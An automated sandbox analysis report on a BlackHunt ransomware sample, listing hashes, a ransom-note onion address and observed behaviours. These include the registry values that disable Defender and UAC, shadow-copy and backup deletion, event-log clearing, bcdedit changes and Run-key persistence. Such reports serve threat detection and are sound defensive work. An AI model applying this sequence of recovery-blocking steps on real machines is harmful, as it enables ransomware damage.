Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 22:56
Static task
static1
Behavioral task
behavioral1
Sample
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
Resource
win10v2004-20231215-en
General
-
Target
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe
-
Size
707KB
-
MD5
abd01c4e46463272ba9cabdca33774f6
-
SHA1
e7c03db020f57de0f9a509831ae5575e3a045c8e
-
SHA256
302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a
-
SHA512
0df4bc9a2a5db42b34ddd1f84229a06c9e1c5325a094e168f8a3f66e93d344c4f76eb9bbf75ce612f910c6b03878933bda3906558bc0685c765947ff6270e627
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1w8Jvnh:6uaTmkZJ+naie5OTamgEoKxLWTth
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2232 fsutil.exe 1924 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1424 wevtutil.exe 2400 wevtutil.exe 608 wevtutil.exe 1108 wevtutil.exe 1352 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2628 bcdedit.exe 2712 bcdedit.exe 2560 bcdedit.exe 2580 bcdedit.exe -
Renames multiple (2891) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1064 wbadmin.exe 1872 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1868 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\K: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\V: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\A: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\P: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\S: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\X: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\W: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\Y: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\I: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\H: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\B: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\N: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\U: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\L: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\Z: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\R: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\J: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened (read-only) \??\M: 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\TraceOut.vb 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jre7\bin\server\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Reference Assemblies\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#BlackHunt_Private.key 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-templates.xml_hidden 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_ReadMe.hta 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#BlackHunt_ReadMe.txt 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 796 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1844 vssadmin.exe 2952 vssadmin.exe 2380 vssadmin.exe 1876 vssadmin.exe 2152 vssadmin.exe 2512 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2828 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2800 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1496 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeRestorePrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeBackupPrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeTakeOwnershipPrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeAuditPrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeSecurityPrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeIncBasePriorityPrivilege 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe Token: SeBackupPrivilege 2540 vssvc.exe Token: SeRestorePrivilege 2540 vssvc.exe Token: SeAuditPrivilege 2540 vssvc.exe Token: SeBackupPrivilege 2612 wbengine.exe Token: SeRestorePrivilege 2612 wbengine.exe Token: SeSecurityPrivilege 2612 wbengine.exe Token: SeSecurityPrivilege 1352 wevtutil.exe Token: SeSecurityPrivilege 1108 wevtutil.exe Token: SeBackupPrivilege 1352 wevtutil.exe Token: SeBackupPrivilege 1108 wevtutil.exe Token: SeSecurityPrivilege 1424 wevtutil.exe Token: SeBackupPrivilege 1424 wevtutil.exe Token: SeSecurityPrivilege 2400 wevtutil.exe Token: SeBackupPrivilege 2400 wevtutil.exe Token: SeSecurityPrivilege 608 wevtutil.exe Token: SeBackupPrivilege 608 wevtutil.exe Token: SeDebugPrivilege 2828 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2392 wrote to memory of 3068 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 29 PID 2392 wrote to memory of 3068 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 29 PID 2392 wrote to memory of 3068 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 29 PID 2392 wrote to memory of 3068 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 29 PID 2392 wrote to memory of 2204 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 150 PID 2392 wrote to memory of 2204 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 150 PID 2392 wrote to memory of 2204 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 150 PID 2392 wrote to memory of 2204 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 150 PID 2392 wrote to memory of 2116 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 148 PID 2392 wrote to memory of 2116 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 148 PID 2392 wrote to memory of 2116 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 148 PID 2392 wrote to memory of 2116 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 148 PID 2392 wrote to memory of 2664 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 35 PID 2392 wrote to memory of 2664 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 35 PID 2392 wrote to memory of 2664 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 35 PID 2392 wrote to memory of 2664 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 35 PID 2392 wrote to memory of 2668 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 130 PID 2392 wrote to memory of 2668 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 130 PID 2392 wrote to memory of 2668 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 130 PID 2392 wrote to memory of 2668 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 130 PID 3068 wrote to memory of 2592 3068 cmd.exe 34 PID 3068 wrote to memory of 2592 3068 cmd.exe 34 PID 3068 wrote to memory of 2592 3068 cmd.exe 34 PID 2116 wrote to memory of 2700 2116 cmd.exe 147 PID 2116 wrote to memory of 2700 2116 cmd.exe 147 PID 2116 wrote to memory of 2700 2116 cmd.exe 147 PID 2204 wrote to memory of 2660 2204 cmd.exe 38 PID 2204 wrote to memory of 2660 2204 cmd.exe 38 PID 2204 wrote to memory of 2660 2204 cmd.exe 38 PID 2392 wrote to memory of 2620 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 37 PID 2392 wrote to memory of 2620 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 37 PID 2392 wrote to memory of 2620 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 37 PID 2392 wrote to memory of 2620 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 37 PID 2392 wrote to memory of 2596 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 146 PID 2392 wrote to memory of 2596 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 146 PID 2392 wrote to memory of 2596 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 146 PID 2392 wrote to memory of 2596 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 146 PID 2392 wrote to memory of 3024 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 39 PID 2392 wrote to memory of 3024 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 39 PID 2392 wrote to memory of 3024 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 39 PID 2392 wrote to memory of 3024 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 39 PID 2392 wrote to memory of 2764 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 189 PID 2392 wrote to memory of 2764 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 189 PID 2392 wrote to memory of 2764 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 189 PID 2392 wrote to memory of 2764 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 189 PID 2392 wrote to memory of 2492 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 162 PID 2392 wrote to memory of 2492 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 162 PID 2392 wrote to memory of 2492 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 162 PID 2392 wrote to memory of 2492 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 162 PID 2392 wrote to memory of 1888 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 218 PID 2392 wrote to memory of 1888 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 218 PID 2392 wrote to memory of 1888 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 218 PID 2392 wrote to memory of 1888 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 218 PID 2392 wrote to memory of 2636 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 43 PID 2392 wrote to memory of 2636 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 43 PID 2392 wrote to memory of 2636 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 43 PID 2392 wrote to memory of 2636 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 43 PID 2392 wrote to memory of 2692 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 139 PID 2392 wrote to memory of 2692 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 139 PID 2392 wrote to memory of 2692 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 139 PID 2392 wrote to memory of 2692 2392 302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe 